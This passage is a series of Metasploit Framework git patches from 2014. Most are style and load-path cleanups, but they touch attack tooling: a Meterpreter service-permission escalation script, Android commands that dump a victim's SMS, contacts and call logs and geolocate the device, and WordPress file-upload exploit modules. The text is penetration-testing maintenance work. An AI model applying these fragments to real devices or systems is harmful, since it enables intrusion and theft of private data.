+  Enabled: false
+
+# Offense count: 480
+# Cop supports --auto-correct.
+# Configuration parameters: AllowIfMethodIsEmpty.
+Style/SingleLineMethods:
+  Enabled: false
+
+# Offense count: 482
+# Cop supports --auto-correct.
+Style/SingleSpaceBeforeFirstArg:
+  Enabled: false
+
+# Offense count: 8
+# Cop supports --auto-correct.
+Style/SpaceAfterColon:
+  Enabled: false
+
+# Offense count: 66361
+# Cop supports --auto-correct.
+Style/SpaceAfterComma:
+  Enabled: false
+
+# Offense count: 1387
+# Cop supports --auto-correct.
+Style/SpaceAfterControlKeyword:
+  Enabled: false
+
+# Offense count: 35
+# Cop supports --auto-correct.
+Style/SpaceAfterMethodName:
+  Enabled: false
+
+# Offense count: 154
+# Cop supports --auto-correct.
+Style/SpaceAfterNot:
+  Enabled: false
+
+# Offense count: 2
+# Cop supports --auto-correct.
+Style/SpaceAfterSemicolon:
+  Enabled: false
+
+# Offense count: 2592
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/SpaceAroundEqualsInParameterDefault:
+  Enabled: false
+
+# Offense count: 9743
+# Cop supports --auto-correct.
+Style/SpaceAroundOperators:
+  Enabled: false
+
+# Offense count: 390
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/SpaceBeforeBlockBraces:
+  Enabled: false
+
+# Offense count: 1297
+# Cop supports --auto-correct.
+Style/SpaceBeforeComment:
+  Enabled: false
+
+# Offense count: 7
+# Cop supports --auto-correct.
+Style/SpaceBeforeModifierKeyword:
+  Enabled: false
+
+# Offense count: 1342
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles, EnforcedStyleForEmptyBraces, SpaceBeforeBlockParameters.
+Style/SpaceInsideBlockBraces:
+  Enabled: false
+
+# Offense count: 24964
+# Cop supports --auto-correct.
+Style/SpaceInsideBrackets:
+  Enabled: false
+
+# Offense count: 2807
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, EnforcedStyleForEmptyBraces, SupportedStyles.
+Style/SpaceInsideHashLiteralBraces:
+  Enabled: false
+
+# Offense count: 5223
+# Cop supports --auto-correct.
+Style/SpaceInsideParens:
+  Enabled: false
+
+# Offense count: 729
+# Cop supports --auto-correct.
+Style/SpecialGlobalVars:
+  Enabled: false
+
+# Offense count: 111166
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/StringLiterals:
+  Enabled: false
+
+# Offense count: 382
+Style/Tab:
+  Enabled: false
+
+# Offense count: 568
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/TrailingBlankLines:
+  Enabled: false
+
+# Offense count: 6257
+# Configuration parameters: EnforcedStyleForMultiline, SupportedStyles.
+Style/TrailingComma:
+  Enabled: false
+
+# Offense count: 1803
+# Cop supports --auto-correct.
+Style/TrailingWhitespace:
+  Enabled: false
+
+# Offense count: 141
+# Cop supports --auto-correct.
+# Configuration parameters: ExactNameMatch, AllowPredicates, AllowDSLWriters, Whitelist.
+Style/TrivialAccessors:
+  Enabled: false
+
+# Offense count: 22
+Style/UnlessElse:
+  Enabled: false
+
+# Offense count: 216
+Style/UnneededCapitalW:
+  Enabled: false
+
+# Offense count: 13
+# Cop supports --auto-correct.
+Style/UnneededPercentX:
+  Enabled: false
+
+# Offense count: 93
+# Cop supports --auto-correct.
+Style/VariableInterpolation:
+  Enabled: false
+
+# Offense count: 740
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/VariableName:
+  Enabled: false
+
+# Offense count: 1520
+# Cop supports --auto-correct.
+Style/WhenThen:
+  Enabled: false
+
+# Offense count: 33
+# Cop supports --auto-correct.
+Style/WhileUntilDo:
+  Enabled: false
+
+# Offense count: 129
+# Configuration parameters: MaxLineLength.
+Style/WhileUntilModifier:
+  Enabled: false
+
+# Offense count: 10722
+# Cop supports --auto-correct.
+Style/WordArray:
+  MinSize: 259

From adf03e28ce36e877a4076930984b71e7314dbd6f Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 29 Jul 2014 17:10:54 -0500
Subject: [PATCH 195/321] Fix SpaceBeforeModifierKeyword Rubocop warning

This also deals with some errant tabs where internal spaces should be,
as well as one syntax error which was preventing an old meterpreter
script from ever working correctly.

Some day, we need to get rid of those Meterpeter scripts. Srsly.
---
 .../scanner/http/nginx_source_disclosure.rb      |  2 +-
 modules/auxiliary/scanner/smtp/smtp_enum.rb      | 16 ++++++++--------
 plugins/wmap.rb                                  |  8 ++------
 .../meterpreter/service_permissions_escalate.rb  |  6 +++---
 4 files changed, 14 insertions(+), 18 deletions(-)

diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb
index fa4d296f94..1a4432a972 100644
--- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb
+++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
           save_source.puts(res.body.to_s)
           save_source.close
 
-          print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}")	if (File.exists?("#{path_save}#{uri}"))
+          print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
 
         else
           print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb
index 32b25218a4..418ac0ebb8 100644
--- a/modules/auxiliary/scanner/smtp/smtp_enum.rb
+++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb
@@ -70,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary
 
   def run_host(ip)
     users_found = {}
-    result = nil							# temp for storing result of SMTP request
-    code = 0							# status code parsed from result
-    vrfy = true							# if vrfy allowed
-    expn = true							# if expn allowed
-    rcpt = true							# if rcpt allowed and useful
+    result = nil # temp for storing result of SMTP request
+    code = 0     # status code parsed from result
+    vrfy = true  # if vrfy allowed
+    expn = true  # if expn allowed
+    rcpt = true  # if rcpt allowed and useful
     usernames = extract_words(datastore['USER_FILE'])
 
     cmd = 'HELO' + " " + "localhost" + "\r\n"
@@ -94,20 +94,20 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     domain = result.split()[1]
-    domain = 'localhost' 					if(domain == '' or not domain or domain.downcase == 'hello')
+    domain = 'localhost' if(domain == '' or not domain or domain.downcase == 'hello')
 
 
     vprint_status("#{ip}:#{rport} Domain Name: #{domain}")
 
     result, code = smtp_send("VRFY root\r\n")
     vrfy = (code == 250)
-    users_found = do_enum('VRFY', usernames)		if (vrfy)
+    users_found = do_enum('VRFY', usernames) if (vrfy)
 
     if(users_found.empty?)
     # VRFY failed, lets try EXPN
       result, code = smtp_send("EXPN root\r\n")
       expn = (code == 250)
-      users_found = do_enum('EXPN', usernames)	if(expn)
+      users_found = do_enum('EXPN', usernames) if(expn)
     end
 
     if(users_found.empty?)
diff --git a/plugins/wmap.rb b/plugins/wmap.rb
index d64471b4be..e5e9d7f678 100644
--- a/plugins/wmap.rb
+++ b/plugins/wmap.rb
@@ -2,13 +2,9 @@
 # Web assessment for the metasploit framework
 # Efrain Torres    - et[ ] metasploit.com  2012
 #
-# $Id$
-# $Revision$
-#
 
 require 'rabal/tree'
 require 'msf/core/rpc/v10/client'
-#require 'fileutils'
 
 module Msf
 
@@ -931,7 +927,7 @@ class Plugin::Wmap < Msf::Plugin
                     end
                   end
 
-                  datastr = temparr.join("&")	if (temparr and not temparr.empty?)
+                  datastr = temparr.join("&") if (temparr and not temparr.empty?)
 
                   if (utest_query.has_key?(signature(form.path,datastr)) == false)
 
@@ -1070,7 +1066,7 @@ class Plugin::Wmap < Msf::Plugin
                     end
                   end
 
-                  datastr = temparr.join("&")	if (temparr and not temparr.empty?)
+                  datastr = temparr.join("&") if (temparr and not temparr.empty?)
 
                   modopts['METHOD'] = req.method.upcase
                   modopts['PATH'] =  req.path
diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb
index adba32dbb8..6256159484 100644
--- a/scripts/meterpreter/service_permissions_escalate.rb
+++ b/scripts/meterpreter/service_permissions_escalate.rb
@@ -78,8 +78,8 @@ handler.datastore['InitialAutoRunScript'] = "migrate -f"
 handler.datastore['ExitOnSession'] = false
 #start a handler to be ready
 handler.exploit_simple(
-  'Payload'	=> handler.datastore['PAYLOAD'],
-  'RunAsJob'       => true
+  'Payload'  => handler.datastore['PAYLOAD'],
+  'RunAsJob' => true
 )
 
 #attempt to make new service
@@ -132,7 +132,7 @@ service_list.each do |serv|
     moved = false
     configed = false
     #default path, but there should be an ImagePath registry key
-    source = "#{sysdir}\\system32\\#{serv}.exe")
+    source = "#{sysdir}\\system32\\#{serv}.exe"
     #get path to exe; parse out quotes and arguments
     sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
     sourcemaybe = client.fs.file.expand_path(sourceorig)

From 1fe459eb4210648f07bffd84d7535877c178cf93 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 29 Jul 2014 18:47:40 -0500
Subject: [PATCH 196/321] Add info to know where the info comes from

---
 modules/auxiliary/scanner/vmware/esx_fingerprint.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb
index 1aa553b135..ca1ee84733 100644
--- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb
+++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
     full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)
     this_host = nil
     if full_match
-      print_good "Identified #{full_match[1]}"
+      print_good("#{rhost}:#{rport} - Identified #{full_match[1]}")
       report_service(:host => (this_host || ip), :port => rport, :proto => 'tcp', :name => 'https', :info => full_match[1])
     end
     if os_match and ver_match and build_match

From ece3b5583a998029c249313b30eb136da41aeaff Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Wed, 30 Jul 2014 00:13:44 -0700
Subject: [PATCH 197/321] Revert to file-based solution.

---
 .../ui/console/command_dispatcher/android.rb  | 33 +++++++++----------
 1 file changed, 15 insertions(+), 18 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 971ef3a230..fadfe75c14 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -80,7 +80,7 @@ class Console::CommandDispatcher::Android
   
   def cmd_dump_sms(*args)
 
-    path = 'sms_dump_' + Rex::Text.rand_text_alpha(8) + '.txt'
+    path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
     dump_sms_opts = Rex::Parser::Arguments.new(
         '-h' => [ false, 'Help Banner' ],
         '-o' => [ false, 'Output path for sms list']
@@ -119,7 +119,7 @@ class Console::CommandDispatcher::Android
 
         smsList.each_with_index { |a, index|
 
-          data << "##{(index.to_i + 1).to_s()}\n"
+          data << "##{index.to_i + 1}\n"
 
           type = 'Unknown'
           if a['type'] == '1'
@@ -154,9 +154,8 @@ class Console::CommandDispatcher::Android
           data << "Message\t: #{a['body']}\n\n"
         }
 
-        path = store_loot("android.sms", "text/plain", client.sock.peerhost, data, "sms.txt", "Android SMS Dump")
+        ::File.write(path, data)
         print_status("Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}")
-        Rex::Compat.open_file(path)
 
         return true
       rescue
@@ -172,7 +171,7 @@ class Console::CommandDispatcher::Android
 
   def cmd_dump_contacts(*args)
 
-    path    = 'contacts_dump_' + Rex::Text.rand_text_alpha(8) + '.txt'
+    path = "contacts_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
     dump_contacts_opts = Rex::Parser::Arguments.new(
 
       '-h' => [ false, 'Help Banner' ],
@@ -213,7 +212,7 @@ class Console::CommandDispatcher::Android
 
         contactList.each_with_index { |c, index|
 
-          data << "##{(index.to_i + 1).to_s()}\n"
+          data << "##{index.to_i + 1}\n"
           data << "Name\t: #{c['name']}\n"
 
           if c['number'].count > 0
@@ -231,9 +230,8 @@ class Console::CommandDispatcher::Android
           data << "\n"
         }
   
-        path = store_loot("android.contacts", "text/plain", client.sock.peerhost, data, "contacts.txt", "Android Contacts Dump")
+        ::File.write(path, data)
         print_status("Contacts list saved to: #{path}")
-        Rex::Compat.open_file(path)
 
         return true
       rescue
@@ -271,15 +269,15 @@ class Console::CommandDispatcher::Android
     geo = client.android.geolocate
 
     print_status('Current Location:')
-    print_line("\tLatitude  : #{geo[0]['lat']}")
-    print_line("\tLongitude : #{geo[0]['long']}\n")
-    print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat']},#{geo[0]['long']}&sensor=true\n")
+    print_line("\tLatitude:  #{geo[0]['lat']}")
+    print_line("\tLongitude: #{geo[0]['long']}\n")
+    print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat'].to_f},#{geo[0]['long'].to_f}&sensor=true\n")
 
 
     if generate_map
-      link = "https://maps.google.com/maps?q=#{geo[0]['lat']},#{geo[0]['long']}"
-      print_status('Generated map on google-maps:')
-      print_status('#{link}')
+      link = "https://maps.google.com/maps?q=#{geo[0]['lat'].to_f},#{geo[0]['long'].to_f}"
+      print_status("Generated map on google-maps:")
+      print_status(link)
       Rex::Compat.open_browser(link)
     end
 
@@ -287,7 +285,7 @@ class Console::CommandDispatcher::Android
 
   def cmd_dump_calllog(*args)
 
-    path = 'dump_calllog_' + Rex::Text.rand_text_alpha(8) + '.txt'
+    path = "dump_calllog_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
     dump_calllog_opts = Rex::Parser::Arguments.new(
 
       '-h' => [ false, 'Help Banner' ],
@@ -327,7 +325,7 @@ class Console::CommandDispatcher::Android
 
         log.each_with_index { |a, index|
 
-          data << "##{(index.to_i + 1).to_s()}\n"
+          data << "##{index.to_i + 1}\n"
 
           data << "Number\t: #{a['number']}\n"
           data << "Name\t: #{a['name']}\n"
@@ -336,9 +334,8 @@ class Console::CommandDispatcher::Android
           data << "Duration: #{a['duration']}\n\n"
         }
 
-        path = store_loot("android.calllog", "text/plain", client.sock.peerhost, data, "call-log.txt", "Android Call Log Dump")
+        ::File.write(path, data)
         print_status("Call log saved to #{path}")
-        Rex::Compat.open_file(path)
 
         return true
       rescue

From ed6594ddb8869df7627d4dd1d185800f2cb24c30 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Wed, 30 Jul 2014 00:16:23 -0700
Subject: [PATCH 198/321] Change filename to calllog_dump.

---
 .../post/meterpreter/ui/console/command_dispatcher/android.rb   | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index fadfe75c14..c540a2b01f 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -285,7 +285,7 @@ class Console::CommandDispatcher::Android
 
   def cmd_dump_calllog(*args)
 
-    path = "dump_calllog_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
+    path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
     dump_calllog_opts = Rex::Parser::Arguments.new(
 
       '-h' => [ false, 'Help Banner' ],

From 58fbb0b421cfeff75f621bc4816711626db1b4d3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 30 Jul 2014 10:24:14 -0500
Subject: [PATCH 199/321] Use [] for References

---
 modules/exploits/unix/webapp/php_wordpress_foxypress.rb | 6 +++---
 modules/exploits/unix/webapp/wp_property_upload_exec.rb | 8 ++++----
 2 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
index fa619f4537..e7eda70624 100644
--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          %w(EDB 18991),
-          %w(OSVDB 82652),
-          %w(BID 53805)
+          ['EDB', '18991'],
+          ['OSVDB' '82652'],
+          ['BID', '53805']
         ],
       'Privileged'     => false,
       'Platform'       => 'php',
diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
index 9f23d79abe..dc355ad290 100644
--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
       info,
       'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
       'Description'    => %q(
-          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
+        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
         plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
         temp directory without authentication, which results in arbitrary code execution.
       ),
@@ -28,9 +28,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          %w(OSVDB 82656),
-          %w(BID 53787),
-          %w(EDB 18987),
+          ['OSVDB', '82656'],
+          ['BID', '53787'],
+          ['EDB', '18987'],
           ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html']
         ],
       'Platform'       => 'php',

From 9de82978480177c722d074d4007dad31b688117a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 30 Jul 2014 10:28:00 -0500
Subject: [PATCH 200/321] Use [] for References

---
 .../exploits/unix/webapp/wp_asset_manager_upload_exec.rb    | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
index 22a6305195..7b08f8bdb3 100644
--- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
@@ -28,9 +28,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          %w(OSVDB 82653),
-          %w(BID 53809),
-          %w(EDB 18993),
+          ['OSVDB', '82653'],
+          ['BID', '53809'],
+          ['EDB', '18993'],
           ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html']
         ],
       'Platform'       => 'php',

From 49e48566dad8c4ea52115c9af736659ee8090899 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 30 Jul 2014 10:28:12 -0500
Subject: [PATCH 201/321] Ignore PercentLiteralDelimiters and WordArray

Per a discussion in IRC, these rules in particular don't
appear to be valuable for Metasploit at this stage.
---
 .rubocop.yml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/.rubocop.yml b/.rubocop.yml
index cba7214ae9..5ab3b803db 100644
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -41,3 +41,18 @@ Style/MethodLength:
 Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
+
+Style/PercentLiteralDelimiters:
+  Enabled: false
+  Description: >-
+                  Metasploit devs tend to prefer [] over %w() for
+                  nearly all cases, since we often deal with funny
+                  looking arrays of nonwords. Consistency here is
+                  preferred over element type safety.
+
+Style/WordArray:
+  Enabled: false
+  Description: >-
+                  Metasploit devs have grown comforatble with curly
+                  braces over parens for %w. Disabling this check
+                  prefers consistency.

From 7bf9d25221d3f94e86dcbc50bfdd1533325800f4 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 30 Jul 2014 10:30:58 -0500
Subject: [PATCH 202/321] Also remove the offenses from the todo

---
 .rubocop_todo.yml | 11 -----------
 1 file changed, 11 deletions(-)

diff --git a/.rubocop_todo.yml b/.rubocop_todo.yml
index ad14d34e6a..5f489f8f7d 100644
--- a/.rubocop_todo.yml
+++ b/.rubocop_todo.yml
@@ -494,12 +494,6 @@ Style/ParameterLists:
 Style/ParenthesesAroundCondition:
   Enabled: false
 
-# Offense count: 2675
-# Cop supports --auto-correct.
-# Configuration parameters: PreferredDelimiters.
-Style/PercentLiteralDelimiters:
-  Enabled: false
-
 # Offense count: 1030
 # Cop supports --auto-correct.
 Style/PerlBackrefs:
@@ -734,8 +728,3 @@ Style/WhileUntilDo:
 # Configuration parameters: MaxLineLength.
 Style/WhileUntilModifier:
   Enabled: false
-
-# Offense count: 10722
-# Cop supports --auto-correct.
-Style/WordArray:
-  MinSize: 259

From 674c3ca260952a7a11f947f652476ae6aae68ae2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 30 Jul 2014 10:44:42 -0500
Subject: [PATCH 203/321] Use [] for references

---
 modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
index 62bf9ba864..9b7977ff37 100644
--- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
+++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
     super(
       'Name'          => 'W3-Total-Cache Wordpress-plugin 0.9.2.4 (or before) Username and Hash Extract',
       'Description'   =>
-          "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements
+        "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements
         and it's results in files for fast access. Version 0.9.2.4 has been fixed afterwards
         so it can be vulnerable. These cache files are in the webroot of the Wordpress
         installation and can be downloaded if the name is guessed. This modules tries to
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
       'License'       => MSF_LICENSE,
       'References'    =>
         [
-          %w(OSVDB 88744),
+          ['OSVDB', '88744'],
           ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/242']
         ],
       'Author'        =>

From 3320a1ef771280996527fb65207e3c176f1ba6f2 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 30 Jul 2014 14:06:46 -0500
Subject: [PATCH 204/321] Revert PR #3574

This reverts commit 96945442ffb78370253c8c4f233b6f6dcfd1ca7f.

With this PR, the following now appears in framework.log:

````
[07/30/2014 14:01:37] [e(0)] core: Error updating module details for
auxiliary/fuzzers/http/http_form_field: NoMethodError undefined method
`name' for []:Array
````
---
 lib/msf/core/module/has_actions.rb | 16 +++++++++-------
 1 file changed, 9 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/module/has_actions.rb b/lib/msf/core/module/has_actions.rb
index d65fb6722e..dc7fd32c81 100644
--- a/lib/msf/core/module/has_actions.rb
+++ b/lib/msf/core/module/has_actions.rb
@@ -16,23 +16,25 @@ module Msf::Module::HasActions
 
   def action
     sa = datastore['ACTION']
-    sa ? find_action(sa) : find_action(default_action)
+    return find_action(default_action) if not sa
+    return find_action(sa)
   end
 
   def find_action(name)
-    if name
-      actions.each do |a|
-        return a if a.name == name
-      end
+    return nil if not name
+    actions.each do |a|
+      return a if a.name == name
     end
+    return nil
   end
 
   #
   # Returns a boolean indicating whether this module should be run passively
   #
   def passive?
-    act = action
-    act ? passive_action?(act.name) : self.passive
+    act = action()
+    return passive_action?(act.name) if act
+    return self.passive
   end
 
   #

From 23b04c8ece1a58b9016dcf16226867a8e2366485 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 30 Jul 2014 13:45:13 -0500
Subject: [PATCH 205/321] Fix post/test/* modules' loadpath

Allows loading when pwd is not framework's install root
---
 test/modules/post/test/extapi.rb                  | 3 ++-
 test/modules/post/test/file.rb                    | 4 +++-
 test/modules/post/test/get_env.rb                 | 3 ++-
 test/modules/post/test/meterpreter.rb             | 3 ++-
 test/modules/post/test/railgun_reverse_lookups.rb | 9 ++++-----
 test/modules/post/test/registry.rb                | 9 ++++-----
 test/modules/post/test/services.rb                | 3 ++-
 test/modules/post/test/unix.rb                    | 4 +++-
 8 files changed, 22 insertions(+), 16 deletions(-)

diff --git a/test/modules/post/test/extapi.rb b/test/modules/post/test/extapi.rb
index adca64609d..3323bc8ad6 100644
--- a/test/modules/post/test/extapi.rb
+++ b/test/modules/post/test/extapi.rb
@@ -2,7 +2,8 @@
 require 'msf/core'
 require 'rex'
 
-$:.push "test/lib" unless $:.include? "test/lib"
+lib = File.join(Msf::Config.install_root, "test", "lib")
+$:.push(lib) unless $:.include?(lib)
 require 'module_test'
 
 class Metasploit4 < Msf::Post
diff --git a/test/modules/post/test/file.rb b/test/modules/post/test/file.rb
index f5b2061ea1..afc414fdf1 100644
--- a/test/modules/post/test/file.rb
+++ b/test/modules/post/test/file.rb
@@ -1,5 +1,7 @@
+require 'msf/core'
 
-$:.push "test/lib" unless $:.include? "test/lib"
+lib = File.join(Msf::Config.install_root, "test", "lib")
+$:.push(lib) unless $:.include?(lib)
 require 'module_test'
 
 #load 'test/lib/module_test.rb'
diff --git a/test/modules/post/test/get_env.rb b/test/modules/post/test/get_env.rb
index 934dd40828..32dcb9376f 100644
--- a/test/modules/post/test/get_env.rb
+++ b/test/modules/post/test/get_env.rb
@@ -1,5 +1,6 @@
+require 'msf/core'
 
-$:.push "test/lib" unless $:.include? "test/lib"
+lib = File.join(Msf::Config.install_root, "test", "lib")
 require 'module_test'
 
 #load 'test/lib/module_test.rb'
diff --git a/test/modules/post/test/meterpreter.rb b/test/modules/post/test/meterpreter.rb
index 16dde5f61b..114baf5dae 100644
--- a/test/modules/post/test/meterpreter.rb
+++ b/test/modules/post/test/meterpreter.rb
@@ -2,7 +2,8 @@
 require 'msf/core'
 require 'rex'
 
-$:.push "test/lib" unless $:.include? "test/lib"
+lib = File.join(Msf::Config.install_root, "test", "lib")
+$:.push(lib) unless $:.include?(lib)
 require 'module_test'
 
 class Metasploit4 < Msf::Post
diff --git a/test/modules/post/test/railgun_reverse_lookups.rb b/test/modules/post/test/railgun_reverse_lookups.rb
index e829b1e432..daf2672635 100644
--- a/test/modules/post/test/railgun_reverse_lookups.rb
+++ b/test/modules/post/test/railgun_reverse_lookups.rb
@@ -1,16 +1,15 @@
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
 require 'rex'
 require 'msf/core/post/windows/railgun'
 
-$:.push "test/lib" unless $:.include? "test/lib"
+lib = File.join(Msf::Config.install_root, "test", "lib")
+$:.push(lib) unless $:.include?(lib)
 require 'module_test'
 
 class Metasploit3 < Msf::Post
diff --git a/test/modules/post/test/registry.rb b/test/modules/post/test/registry.rb
index d22b3fc7aa..f6e1e13bd5 100644
--- a/test/modules/post/test/registry.rb
+++ b/test/modules/post/test/registry.rb
@@ -1,16 +1,15 @@
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
 require 'rex'
 require 'msf/core/post/windows/registry'
 
-$:.push "test/lib" unless $:.include? "test/lib"
+lib = File.join(Msf::Config.install_root, "test", "lib")
+$:.push(lib) unless $:.include?(lib)
 require 'module_test'
 
 class Metasploit3 < Msf::Post
diff --git a/test/modules/post/test/services.rb b/test/modules/post/test/services.rb
index a09af403ec..08454fa920 100644
--- a/test/modules/post/test/services.rb
+++ b/test/modules/post/test/services.rb
@@ -6,7 +6,8 @@ require 'msf/core'
 require 'rex'
 require 'msf/core/post/windows/services'
 
-$:.push "test/lib" unless $:.include? "test/lib"
+lib = File.join(Msf::Config.install_root, "test", "lib")
+$:.push(lib) unless $:.include?(lib)
 require 'module_test'
 
 class Metasploit3 < Msf::Post
diff --git a/test/modules/post/test/unix.rb b/test/modules/post/test/unix.rb
index a637c7ccac..e862a388d8 100644
--- a/test/modules/post/test/unix.rb
+++ b/test/modules/post/test/unix.rb
@@ -1,5 +1,7 @@
+require 'msf/core'
 
-$:.push "test/lib" unless $:.include? "test/lib"
+lib = File.join(Msf::Config.install_root, "test", "lib")
+$:.push(lib) unless $:.include?(lib)
 require 'module_test'
 
 #load 'test/lib/module_test.rb'

From 8af4c496c9643123854e67e5290b14c8ba565fd4 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 31 Jul 2014 16:08:25 -0400
Subject: [PATCH 206/321] Add a missing include and require statement for psh

